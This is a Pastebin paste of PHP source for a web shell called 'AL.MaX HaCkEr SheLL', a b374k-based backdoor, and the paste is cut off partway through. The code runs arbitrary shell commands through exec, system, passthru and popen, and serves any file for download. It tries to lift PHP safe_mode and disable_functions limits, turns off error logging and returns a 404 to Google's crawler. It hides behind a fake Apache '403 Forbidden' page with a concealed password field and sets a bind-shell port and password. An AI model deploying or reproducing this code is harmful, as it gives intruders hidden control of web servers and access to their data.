EddieKidiw

Private ! AL.MaX HaCkEr SheLL Decoder By Eddie Kidiw

Nov 15th, 2015
160
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 283.38 KB | None | 0 0
  1. <?php
  2. ###########################################
  3. # Private ! AL.MaX HaCkEr SheLL #
  4. # AL.MaX HaCkEr #
  5. # Gun@linuxmail.org #
  6. ###########################################
  7.  
  8. //Change User & Password
  9.  
  10. $tacfgd['uname'] = 'AL.MaX HaCkEr';
  11. $tacfgd['pword'] = 's4cuc:518';
  12.  
  13.  
  14. // Title of page.
  15. $tacfgd['title'] = '';
  16.  
  17. // Text to appear just above login form.
  18. $tacfgd['helptext'] = '';
  19.  
  20.  
  21. // Set to true to enable the optional remember-me feature, which stores encrypted login details to
  22. // allow users to be logged-in automatically on their return. Turn off for a little extra security.
  23. $tacfgd['allowrm'] = true;
  24.  
  25. // If you have multiple protected pages, and there's more than one username / password combination,
  26. // you need to group each combination under a distinct rmgroup so that the remember-me feature
  27. // knows which login details to use.
  28. $tacfgd['rmgroup'] = 'default';
  29.  
  30. // Set to true if you use your own sessions within your protected page, to stop txtAuth interfering.
  31. // In this case, you _must_ call session_start() before you require() txtAuth. Logging out will not
  32. // destroy the session, so that is left up to you.
  33. $tacfgd['ownsessions'] = false;
  34.  
  35.  
  36.  
  37.  
  38. foreach ($tacfgd as $key => $val) {
  39. if (!isset($tacfg[$key])) $tacfg[$key] = $val;
  40. }
  41.  
  42. if (!$tacfg['ownsessions']) {
  43. session_name('txtauth');
  44. session_start();
  45. }
  46.  
  47. // Logout attempt made. Deletes any remember-me cookie as well
  48. if (isset($_GET['logout']) || isset($_POST['logout'])) {
  49. setcookie('txtauth_'.$rmgroup, '', time()-86400*14);
  50. if (!$tacfg['ownsessions']) {
  51. $_SESSION = array();
  52. session_destroy();
  53. }
  54. else $_SESSION['txtauthin'] = false;
  55. }
  56. // Login attempt made
  57. elseif (isset($_POST['login'])) {
  58. if ($_POST['uname'] == $tacfg['uname'] && $_POST['pword'] == $tacfg['pword']) {
  59. $_SESSION['txtauthin'] = true;
  60. if ($_POST['rm']) {
  61. // Set remember-me cookie for 2 weeks
  62. setcookie('txtauth_'.$rmgroup, md5($tacfg['uname'].$tacfg['pword']), time()+86400*14);
  63. }
  64. }
  65. else $err = 'Login Faild !';
  66. }
  67. // Remember-me cookie exists
  68. elseif (isset($_COOKIE['txtauth_'.$rmgroup])) {
  69. if (md5($tacfg['uname'].$tacfg['pword']) == $_COOKIE['txtauth_'.$rmgroup] && $tacfg['allowrm']) {
  70. $_SESSION['txtauthin'] = true;
  71. }
  72. else $err = 'Login Faild !';
  73. }
  74. if (!$_SESSION['txtauthin']) {
  75. @ini_restore("safe_mode");
  76. @ini_restore("open_basedir");
  77. @ini_restore("safe_mode_include_dir");
  78. @ini_restore("safe_mode_exec_dir");
  79. @ini_restore("disable_functions");
  80. @ini_restore("allow_url_fopen");
  81.  
  82. @ini_set('error_log',NULL);
  83. @ini_set('log_errors',0);
  84. ?>
  85. <html dir=rtl>
  86. <head>
  87.  
  88. <STYLE>
  89.  
  90. * {
  91. padding:0;
  92. margin:0;
  93. }
  94.  
  95. div.end *
  96. {
  97. font-size:small;
  98. }
  99.  
  100. div.end
  101. {
  102. width:100%;
  103. background:#222;
  104. }
  105.  
  106. body
  107. {
  108. background-color:black;
  109. color:rgb(35,182,39);
  110. font-family:Tahoma,Verdana,Arial;
  111. font-size: small;
  112. }
  113.  
  114. input.own {
  115. background-color: Green;
  116. color: white;
  117. border : 1px solid #ccc;
  118. }
  119.  
  120. blockquote.small
  121. {
  122. font-size: smaller;
  123. color: silver;
  124. text-align: center;
  125. }
  126.  
  127. table.files
  128. {
  129. border-spacing: 10px;
  130. font-size: small;
  131. }
  132.  
  133. h1 {
  134. padding: 4px;
  135. padding-bottom: 0px;
  136. margin-right : 5px;
  137. }
  138. div.logo
  139. {
  140. border-right: 1px aqua solid;
  141. }
  142. div.header
  143. {
  144. padding-left: 5px;
  145. font-size: small;
  146. text-align: left;
  147. }
  148. div.nav
  149. {
  150. margin-top:1px;
  151. height:30px;
  152. background-color: #ccc;
  153. }
  154. div.nav ul
  155. {
  156. list-style: none;
  157. padding: 4px;
  158. }
  159. div.nav li
  160. {
  161. float: left;
  162. margin-right: 10px;
  163. text-align:center;
  164. }
  165. textarea.cmd
  166. {
  167. border : 1px solid #111;
  168. background-color : green;
  169. font-family: Shell;
  170. color : black;
  171. margin-top: 10px;
  172. font-size:small;
  173. }
  174.  
  175. input.cmd
  176. {
  177. background-color:black;
  178. color: white;
  179. width: 400px;
  180. border : 1px solid #ccc;
  181.  
  182. }
  183. td.maintext
  184. {
  185. font-size: large;
  186. }
  187. #margins
  188. {
  189. margin-left: 50px;
  190. margin-top: 10px;
  191. color:white;
  192. }
  193. table.top
  194. {
  195. border-bottom: 1px solid aqua;
  196. width: 100%;
  197. }
  198. #borders
  199. {
  200. border-top : 1px solid aqua;
  201. border-left:1px solid aqua;
  202. border-bottom: 1px solid aqua;
  203. border-right: 1px solid aqua;
  204. margin-bottom:0;
  205. }
  206. td.file a
  207. {
  208. color : aqua;
  209. text-decoration:none;
  210. }
  211. td.dir a
  212. {
  213. color : white;
  214. text-decoration:none;
  215. }
  216. td.download,td.download2
  217. {
  218. color:green;
  219. }
  220. #spacing
  221. {
  222. padding:10px;
  223. margin-left:200px;
  224. }
  225. th.header
  226. {
  227. background: none repeat scroll 0 0 #191919;
  228. color: black;
  229. border-bottom : 1px solid #333333;
  230. }
  231. img.imageForm
  232. {
  233. padding: 53px;
  234. }
  235.  
  236. </STYLE>
  237. <script language=\'javascript\'>
  238. function hide_div(id)
  239. {
  240. document.getElementById(id).style.display = \'none\';
  241. document.cookie=id+\'=0;\';
  242. }
  243. function show_div(id)
  244. {
  245. document.getElementById(id).style.display = \'block\';
  246. document.cookie=id+\'=1;\';
  247. }
  248. function change_divst(id)
  249. {
  250. if (document.getElementById(id).style.display == \'none\')
  251. show_div(id);
  252. else
  253. hide_div(id);
  254. }
  255. </script>
  256. <body>
  257. <br>
  258. <form name="txtauth" action="/40.php" method="post">
  259. <div align="center" style="width: 1113px; height: 306px" class="style40">
  260. <pre>
  261. </b></font><font color="grey"><b><img alt="" src="http://www.iconeasy.com/icon/png/Flag/Africa/Sudan.png" width="256" height="256" style="float: left"></b></font></pre>
  262. <pre>
  263. &nbsp;</pre>
  264. <pre>
  265. &nbsp;</pre>
  266. <pre>
  267. &nbsp;</pre>
  268. <pre>
  269. &nbsp;</pre>
  270. <pre>
  271. &nbsp;</pre>
  272. <pre>
  273. &nbsp;</pre>
  274. <pre>
  275. <img alt="" src="http://www.up-king.com:8080/almaciat/ufph33in38ifue6yswzh.png" style="float: left" width="307" height="165"><b><font color="grey">
  276. </font></b><font color="grey">
  277. <pre>
  278. &nbsp;</pre>
  279. </div>
  280. </form>
  281.  
  282. <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.u-ad.info/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582AaN6h071sG%2bV99GKy6ADz5gSD80OQ9zKugYPkVGpwykNaXXA7o1AVBfE3sfQ4WIM2S5oX0Y6oI5vMVfQZ4ipKT5tFV8Tp7Rmlo0KC6cA6MNA41KeAtrcw8o6ggSZeWhN%2fow59e4%2fhzJSR2orvPml20fVyw%2fMNwQhbuBapd2ZO5zWLEIzZYlUctH0W0oLVCOpVKHNOWkXsy4Js%2fBl8mGu5VJNUlTwXiNq97a9YJIe0dR193%2bfs3Ms0TqxsjnGBDdzV7yrpng%2fW8pL97cYRKdiqJqhmElLElRRQA4J3crpUKulLxn74n2qHQDOxYORpfWETL3gXFVIwKMjz0u0tGpC5RVEUrXFSPwdrnFpjCFSdbIc2ZDCoTVZl9Cv6v%2f0SssXZ1EmfbIM1YubKvQ%2bwDR3z0PCvF20rGjpO%2b%2fC61q3HR3C8RMHXfge8NU6XqPU%2f0hJ%2fo8muHhvP6wb0VCt3i5yg7Xjj6008hH6Q%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
  283. </html>
  284.  
  285. <html dir=rtl>
  286. <head>
  287. <meta http-equiv="Content-Type" content="text/html; charset=windows-1256">
  288. <title>Private ! .. AL.MaX HaCkEr SheLL </title>
  289.  
  290. <STYLE>
  291.  
  292. BODY
  293. {
  294. }
  295.  
  296. tr {
  297. }
  298. BODY {
  299. margin: 1;
  300. color: #dadada;
  301. background-color: #000000;
  302. }
  303. A:link {COLOR:red; TEXT-DECORATION: none}
  304. A:visited { COLOR:red; TEXT-DECORATION: none}
  305. A:active {COLOR:red; TEXT-DECORATION: none}
  306. A:hover {color:blue;TEXT-DECORATION: none}
  307.  
  308. </STYLE>
  309. <script language=\'javascript\'>
  310. function hide_div(id)
  311. {
  312. document.getElementById(id).style.display = \'none\';
  313. document.cookie=id+\'=0;\';
  314. }
  315. function show_div(id)
  316. {
  317. document.getElementById(id).style.display = \'block\';
  318. document.cookie=id+\'=1;\';
  319. }
  320. function change_divst(id)
  321. {
  322. if (document.getElementById(id).style.display == \'none\')
  323. show_div(id);
  324. else
  325. hide_div(id);
  326. }
  327. </script>
  328. <body>
  329. <form name="txtauth" action="<?=$action?>" method="post">
  330. <div class="style34" style="width: 1043px; height: 67px;">
  331. <table cellpadding="4" cellspacing="0" style="width: 216px;" dir="ltr" class="style35" align="center">
  332. <?=(isset($err))?'<tr><td colspan="2" align="center"><font color="red">'.$err.'</font></td></tr>':''?>
  333. <?if (isset($tacfg['uname'])) {?>
  334. <tr><td>User:</td><td class="style37"><input type="text" name="uname" value="" size="20" maxlength="100" class="txtbox"></td></tr>
  335. <?}?>
  336. <tr><td>Password:</td><td class="style36"><input type="password" name="pword" value="" size="20" maxlength="100" class="txtbox"></td></tr>
  337. <?if ($tacfg['allowrm']) {?>
  338. <tr><td><input type="submit" name="login" value="Login">
  339. </td><td><input type="checkbox" name="rm" id="rm"><label for="rm">
  340. Remmeber Me?</label></td></tr>
  341. <?} else {?>
  342. <tr><td colspan="2">
  343. <input type="submit" name="login" value="Login"></td></tr>
  344. <?}?>
  345. </table>
  346. </div>
  347. </form>
  348.  
  349. <div>
  350.  
  351. <br><br>
  352. </div>
  353. <div class="smalltxt" align="center"><font color="grey">
  354.  
  355. <div class="end">
  356. <p align="center"><b>&nbsp;</b><br />
  357. </p>
  358. <table style="border: 2px solid rgb(218, 218, 218);" width="100%" bgcolor="#000000" height="%">
  359. <tr>
  360. <td><center><font color="white" face="tahoma" size="4"><b>
  361. [
  362. <span class="style27"> &nbsp;<font color="red" size="5"><span style="font-weight: 700; filter: blur(add=1, direction=270, strength=30)"><font class="whiteglow" face="tahoma"><span <ul=""><font color="#808080" face="Tahoma"><span <ul="" lang="en-us"><font color="white" face="tahoma" size="4"><span class="style41">Private
  363. ! .. AL.MaX HaCkEr SheLL</span><span class="style25"><font color="Green"><font class="style26" color="gray" size="-2"><span class="style21"><strong>
  364. <font color="white" face="tahoma" size="4">|</font> v.</strong>3</span></font></font></span></font>
  365. - Copyright
  366. / <font color="#FFFFFF" face="Tahoma">2013
  367. <a style="text-decoration: none; " href="http://www.zone-h.com/archive/notifier=AL.MaX%20HaCkEr">
  368. <font color="#FFFFFF">AL.MaX HaCkEr </font></a></font></span>
  369. <font color="#000000">
  370. &nbsp;</font></font></span></font></span></font></span>&nbsp;]<span class="style27">
  371. </span> <br>
  372. <span class="style27"> <font color="red" size="5"><span style="font-weight: 700; filter: blur(add=1, direction=270, strength=30)"><font class="whiteglow" face="tahoma"><span <ul=""><font color="#808080" face="Tahoma">&nbsp;
  373. <font color="#000000">
  374. <a style="text-decoration: none" href="http://www.zone-h.com/archive/notifier=AL.MaX%20HaCkEr">
  375. <font color="#808080" face="Tahoma">Zone-h</font></a><font color="red" size="5" face="tahoma"><font class="whiteglow" face="tahoma"><font color="#808080" face="Tahoma"> <img alt="" src="http://www.senojflags.com/images/national-flag-icons/Sudan-Flag.png" height="16" width="16"></font></font></font> </font></font>
  376. </span></font></span></font> </span>
  377. </b>
  378. <strong class="style42">Gun@Linuxmail.Org</strong></font></center></td>
  379. </tr>
  380. </table>
  381. <p align="center">&nbsp;</p>
  382. </div>
  383. </font></div>
  384.  
  385. </body>
  386. </html>
  387. <?
  388. // Don't delete this!
  389. exit();
  390. }
  391. ?>
  392. </p>
  393. <div class="style38">
  394.  
  395.  
  396. <div class="style38">
  397.  
  398.  
  399. <?php
  400. /*********************************************************************************************************/
  401. $auth_pass = ""; //password crypted with md5, default is 'AL.MaX HaCkEr'
  402. /*********************************************************************************************************/
  403. $color = "#00ff00";
  404. $default_action = 'FilesMan';
  405. @define('SELF_PATH', __FILE__);
  406.  
  407. /*********************************************************************************************************/
  408. # Avoid google's crawler
  409. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) { header('HTTP/1.0 404 Not Found'); exit; }
  410. /*********************************************************************************************************/
  411.  
  412. @session_start();
  413. @error_reporting(0);
  414. @ini_set('error_log',NULL);
  415. @ini_set('log_errors',0);
  416. @ini_set('max_execution_time',0);
  417. @set_time_limit(0);
  418. @set_magic_quotes_runtime(0);
  419. @define('VERSION', 'v.2012');
  420. @define('TITLE', ':: b374k AL.MaX HaCkEr 2012 ::');
  421.  
  422. /*********************************************************************************************************/
  423.  
  424. if( get_magic_quotes_gpc() )
  425. {
  426. function stripslashes_array($array) { return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); }
  427. $_POST = stripslashes_array($_POST);
  428. }
  429.  
  430. function logout()
  431. {
  432. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  433. $page = $host='http://'.$_SERVER['SERVER_NAME'].'/'.$_SERVER['PHP_SELF'];
  434. echo '<center><span class="b1">The System Is Going To Down For LogOut Administrator Pages!!</scan></center>';
  435. ?>
  436. <script>window.location.href = '<?php print $page; ?>';</script>
  437. <?php
  438. exit(0);
  439. }
  440.  
  441. function myshellexec($command) {
  442. if (!($p=popen("($command)2>&1","r"))) {
  443. return 126;
  444. }
  445. while (!feof($p)) {
  446. $line=fgets($p,1000);
  447. $out .= $line;
  448. }
  449. pclose($p);
  450. return $out;
  451. }
  452.  
  453. function parsesort($sort)
  454. {
  455. $one = intval($sort);
  456. $second = substr($sort,-1);
  457. if ($second != "d") {$second = "a";}
  458. return array($one,$second);
  459. }
  460.  
  461. $disablefunc = @ini_get("disable_functions");
  462.  
  463. function showdisablefunctions() {
  464. if ($disablefunc=@ini_get("disable_functions")){ return "<span style='color:#00FF1E'>".$disablefunc."</span>"; }
  465. else { return "<span style='color:#00FF1E'>NONE</span>"; }
  466. }
  467.  
  468. function ex($cfe) {
  469. $res = '';
  470. if (!empty($cfe)) {
  471. if(function_exists('exec')) {
  472. @exec($cfe,$res);
  473. $res = join("\n",$res);
  474. } elseif(function_exists('shell_exec')) {
  475. $res = @shell_exec($cfe);
  476. } elseif(function_exists('system')) {
  477. @ob_start();
  478. @system($cfe);
  479. $res = @ob_get_contents();
  480. @ob_end_clean();
  481. } elseif(function_exists('passthru')) {
  482. @ob_start();
  483. @passthru($cfe);
  484. $res = @ob_get_contents();
  485. @ob_end_clean();
  486. } elseif(@is_resource($f = @popen($cfe,"r"))) {
  487. $res = "";
  488. while(!@feof($f)) { $res .= @fread($f,1024); }
  489. @pclose($f);
  490. } else { $res = "Ex() Disabled!"; }
  491. }
  492. return $res;
  493. }
  494.  
  495.  
  496. function showstat($stat) {
  497. if ($stat=="on") { return "<b><font style='color:#00FF00'>ON</font></b>"; }
  498. else { return "<b><font style='color:#DD4736'>OFF</font></b>"; }
  499. }
  500. function testperl() {
  501. if (ex('perl -h')) { return showstat("on"); }
  502. else { return showstat("off"); }
  503. }
  504. function testfetch() {
  505. if(ex('fetch --help')) { return showstat("on"); }
  506. else { return showstat("off"); }
  507. }
  508. function testwget() {
  509. if (ex('wget --help')) { return showstat("on"); }
  510. else { return showstat("off"); }
  511. }
  512. function testoracle() {
  513. if (function_exists('ocilogon')) { return showstat("on"); }
  514. else { return showstat("off"); }
  515. }
  516. function testpostgresql() {
  517. if (function_exists('pg_connect')) { return showstat("on"); }
  518. else { return showstat("off"); }
  519. }
  520. function testmssql() {
  521. if (function_exists('mssql_connect')) { return showstat("on"); }
  522. else { return showstat("off"); }
  523. }
  524. function testcurl() {
  525. if (function_exists('curl_version')) { return showstat("on"); }
  526. else { return showstat("off"); }
  527. }
  528. function testmysql() {
  529. if (function_exists('mysql_connect')) { return showstat("on"); }
  530. else { return showstat("off"); }
  531. }
  532.  
  533. $quotes = get_magic_quotes_gpc();
  534. if ($quotes == "1" or $quotes == "on")
  535. {
  536. $quot = "<font style='color:red'>ON</font>";
  537. }
  538. else
  539. {
  540. $quot = "<font style='color:green'>OFF</font>";
  541. }
  542.  
  543. function printLogin()
  544. {
  545. ?>
  546. <html xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office">
  547. <head>
  548. <style> input { margin:0;background-color:#fff;border:1px solid #fff; } </style>
  549. </head>
  550. <title>
  551. 403 Forbidden
  552. </title>
  553. <body>
  554. </div>
  555. <h1 class="style38">Forbidden</h1>
  556. <p class="style38">You don't have permission to access this file on this server <?=$_SERVER['HTTP_HOST']?>.</p>
  557. <hr>
  558. <form method=post>
  559. <address class="style38">Apache/2.2.8 at <?=$_SERVER['HTTP_HOST']?> Port 80<center class="style38"><input type=password name=x><input type=submit value=''></center></address>
  560. </form>
  561. <div class="style38">
  562. </body>
  563. </html>
  564. <?php
  565. exit;
  566. }
  567.  
  568. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  569. {
  570. if( empty( $auth_pass ) || ( isset( $_POST['x'] ) && ( md5($_POST['x']) == $auth_pass ) ) )
  571. { $_SESSION[md5($_SERVER['HTTP_HOST'])] = true; }
  572. else
  573. { printLogin(); }
  574. }
  575.  
  576. if(isset($_GET['dl']) && ($_GET['dl'] != ""))
  577. {
  578. $file = $_GET['dl'];
  579. $filez = @file_get_contents($file);
  580. header("Content-type: application/octet-stream");
  581. header("Content-length: ".strlen($filez));
  582. header("Content-disposition: attachment;
  583. filename=\"".basename($file)."\";");
  584. echo $filez;
  585. exit;
  586. }
  587.  
  588. elseif(isset($_GET['dlgzip']) && ($_GET['dlgzip'] != ""))
  589. {
  590. $file = $_GET['dlgzip'];
  591. $filez = gzencode(@file_get_contents($file));
  592. header("Content-Type:application/x-gzip\n");
  593. header("Content-length: ".strlen($filez));
  594. header("Content-disposition: attachment; filename=\"".basename($file).".gz\";");
  595. echo $filez; exit;
  596. }
  597.  
  598. if(isset($_GET['img']))
  599. {
  600. @ob_clean();
  601. $d = magicboom($_GET['y']);
  602. $f = $_GET['img'];
  603. $inf = @getimagesize($d.$f);
  604. $ext = explode($f,".");
  605. $ext = $ext[count($ext)-1];
  606. @header("Content-type: ".$inf["mime"]);
  607. @header("Cache-control: public");
  608. @header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
  609. @header("Cache-control: max-age=".(60*60*24*7));
  610. @readfile($d.$f);
  611. exit;
  612. }
  613. $ver = VERSION;
  614.  
  615. $DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
  616.  
  617. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") $safemode = TRUE;
  618. else $safemode = FALSE;
  619. $system = @php_uname();
  620.  
  621. if(strtolower(substr($system,0,3)) == "win") $win = TRUE;
  622. else $win = FALSE;
  623.  
  624. if(isset($_GET['y']))
  625. { if(@is_dir($_GET['view'])){ $pwd = $_GET['view']; @chdir($pwd); } else{ $pwd = $_GET['y']; @chdir($pwd); } }
  626.  
  627. if(!$win)
  628. { if(!$user = rapih(exe("whoami"))) $user = ""; if(!$id = rapih(exe("id"))) $id = ""; $prompt = $user." \$ "; $pwd = @getcwd().DIRECTORY_SEPARATOR; }
  629. else
  630. {
  631. $user = @get_current_user();
  632. $id = $user;
  633. $prompt = $user." &gt;";
  634. $pwd = realpath(".")."\\";
  635. $v = explode("\\",$d);
  636. $v = $v[0];
  637. foreach (range("A","Z") as $letter)
  638. {
  639. $bool = @is_dir($letter.":\\");
  640. if ($bool)
  641. {
  642. $letters .= "<a href=\"?y=".$letter.":\\\">[ ";
  643. if ($letter.":" != $v) {$letters .= $letter;}
  644. else {$letters .= "<span class=\"gaya\">".$letter."</span>";}
  645. $letters .= " ]</a> ";
  646. }
  647. }
  648. }
  649.  
  650. if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
  651. else $posix = FALSE;
  652.  
  653.  
  654. $bytes = disk_free_space(".");
  655. $si_prefix = array( 'B', 'KB', 'MB', 'GB', 'TB', 'EB', 'ZB', 'YB' );
  656. $base = 1024;
  657. $class = min((int)log($bytes , $base) , count($si_prefix) - 1);
  658. $totalspace_bytes = disk_total_space(".");
  659. $totalspace_si_prefixs = array( 'B', 'KB', 'MB', 'GB', 'TB', 'EB', 'ZB', 'YB' );
  660. $totalspace_bases = 1024;
  661. $totalspace_class = min((int)log($totalspace_bytes , $totalspace_bases) , count($totalspace_si_prefixs) - 1);
  662. $totalspace_show = sprintf('%1.2f' , $totalspace_bytes / pow($totalspace_bases,$totalspace_class)) . ' ' . $totalspace_si_prefixs[$totalspace_class] . '';
  663. $freespace_show = sprintf('%1.2f' , $bytes / pow($base,$class)) . ' ' . $si_prefix[$class] . '';
  664. $server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);
  665. $my_ip = $_SERVER['REMOTE_ADDR'];
  666. $bindport = "55555";
  667. $bindport_pass = "AL.MaX HaCkEr";
  668. $pwds = explode(DIRECTORY_SEPARATOR,$pwd);
  669. $pwdurl = "";
  670. for($i = 0 ; $i < sizeof($pwds)-1 ; $i++)
  671. {
  672. $pathz = "";
  673. for($j = 0 ; $j <= $i ; $j++)
  674. {
  675. $pathz .= $pwds[$j].DIRECTORY_SEPARATOR;
  676. }
  677. $pwdurl .= "<a href=\"?y=".$pathz."\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>";
  678. }
  679.  
  680. if(isset($_POST['rename'])){
  681. $old = $_POST['oldname'];
  682. $new = $_POST['newname'];
  683. @rename($pwd.$old,$pwd.$new);
  684. $file = $pwd.$new;
  685. }
  686. if(isset($_POST['chmod'])){
  687. $name = $_POST['name'];
  688. $value = $_POST['newvalue'];
  689. if (strlen($value)==3){
  690. $value = 0 . "" . $value;
  691. }
  692. @chmod($pwd.$name,octdec($value));
  693. $file = $pwd.$name;
  694. }
  695. if(isset($_POST['chmod_folder'])){
  696. $name = $_POST['name'];
  697. $value = $_POST['newvalue'];
  698. if (strlen($value)==3){
  699. $value = 0 . "" . $value;
  700. }
  701. @chmod($pwd.$name,octdec($value));
  702. $file = $pwd.$name;
  703. }
  704. $buff = $DISP_SERVER_SOFTWARE."<br />";
  705. $buff .= '<font style="color:#F58F78">'.$system.'</font><br />';
  706. if($id != "") $buff .= $id."<br />";
  707. $buff .= "Server IP : "."<span style='color:#FF8800'>$server_ip</span>"."<font> | </font>"."Your IP : "."<span style='color:#FF0000'>$my_ip</span>"."<br />";
  708. $buff .= "Total HDD Space : "."<span style='color:#00FF1E'>$totalspace_show</span>"."<font> | </font>"."Free HDD Space : "."<span style='color:#00FF1E'>$freespace_show</span>"."<br />";
  709. $buff .= "Magic Quotes:$quot"."<br>";
  710. $buff .= "Disabled Functions: ".showdisablefunctions()."<br>";
  711. $buff .= "MySQL: ".testmysql()." MSSQL: ".testmssql()." Oracle: ".testoracle()." MSSQL: ".testmssql()." PostgreSQL: ".testpostgresql()." cURL: ".testcurl()." WGet: ".testwget()." Fetch: ".testfetch()." Perl: ".testperl()."<br>";
  712. if($safemode) $buff .= "safemode <span class=\"gaya\">ON</span><br />";
  713. else $buff .= "safemode <span class=\"gaya\">OFF<span><br />";
  714. $buff .= $letters."&nbsp;&gt;&nbsp;".$pwdurl;
  715.  
  716. function rapih($text){ return trim(str_replace("<br />","",$text)); }
  717.  
  718. function magicboom($text){ if (!get_magic_quotes_gpc()) { return $text; } return stripslashes($text); }
  719.  
  720. function showdir($pwd,$prompt)
  721. {
  722. $fname = array();
  723. $dname = array();
  724. if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
  725. else $posix = FALSE;
  726. $user = "????:????";
  727. if($dh = opendir($pwd))
  728. {
  729. while($file = readdir($dh))
  730. {
  731. if(is_dir($file))
  732. { $dname[] = $file; }
  733. elseif(is_file($file))
  734. { $fname[] = $file; }
  735. }
  736. closedir($dh);
  737. }
  738. sort($fname);
  739. sort($dname);
  740. $path = @explode(DIRECTORY_SEPARATOR,$pwd);
  741. $tree = @sizeof($path);
  742. $parent = "";
  743. $buff = "<form action=\"?y=".$pwd."&amp;x=shell\" method=\"post\" style=\"margin:8px 0 0 0;\">
  744. <table class=\"cmdbox\" style=\"width:50%;\">
  745. <tr>
  746. <td>CMD@$prompt</td>
  747. <td><input onMouseOver=\"this.focus();\" id=\"cmd\" class=\"inputz\" type=\"text\" name=\"cmd\" style=\"width:400px;\" value=\"\" />
  748. <input class=\"inputzbut\" type=\"submit\" value=\"Execute !\" name=\"submitcmd\" style=\"width:80px;\" /></td>
  749. </tr>
  750. </form>
  751. <form action=\"?\" method=\"get\" style=\"margin:8px 0 0 0;\">
  752. <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  753. <tr>
  754. <td>view file/folder</td>
  755. <td><input onMouseOver=\"this.focus();\" id=\"goto\" class=\"inputz\" type=\"text\" name=\"view\" style=\"width:400px;\" value=\"".$pwd."\" />
  756. <input class=\"inputzbut\" type=\"submit\" value=\"Enter !\" name=\"submitcmd\" style=\"width:80px;\" /></td>
  757. </tr>
  758. </form>
  759. </table>
  760. <table class=\"explore\">
  761. <tr>
  762. <th>name</th>
  763. <th style=\"width:80px;\">size</th>
  764. <th style=\"width:210px;\">owner:group</th>
  765. <th style=\"width:80px;\">perms</th>
  766. <th style=\"width:110px;\">modified</th>
  767. <th style=\"width:190px;\">actions</th>
  768. </tr> ";
  769.  
  770. if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;
  771. else $parent = $pwd;
  772. foreach($dname as $folder)
  773. {
  774. if($folder == ".")
  775. {
  776. if(!$win && $posix)
  777. {
  778. $name=@posix_getpwuid(@fileowner($folder));
  779. $group=@posix_getgrgid(@filegroup($folder));
  780. $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  781. }
  782. else { $owner = $user; }
  783. $buff .= "<tr>
  784. <td><a href=\"?y=".$pwd."\">$folder</a></td>
  785. <td>-</td>
  786. <td style=\"text-align:center;\">".$owner."</td>
  787. <td><center>".get_perms($pwd)."</center></td>
  788. <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($pwd))."</td>
  789. <td><span id=\"titik1\">
  790. <a href=\"?y=$pwd&amp;edit=".$pwd."newfile.php\">newfile</a>
  791. | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a>
  792. </span>
  793. <form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  794. <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  795. <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
  796. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go\" />
  797. </form>
  798. </td>
  799. </tr> ";
  800. }
  801. elseif($folder == "..")
  802. {
  803. if(!$win && $posix)
  804. {
  805. $name=@posix_getpwuid(@fileowner($folder));
  806. $group=@posix_getgrgid(@filegroup($folder));
  807. $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  808. }
  809. else { $owner = $user; }
  810. $buff .= "<tr>
  811. <td>
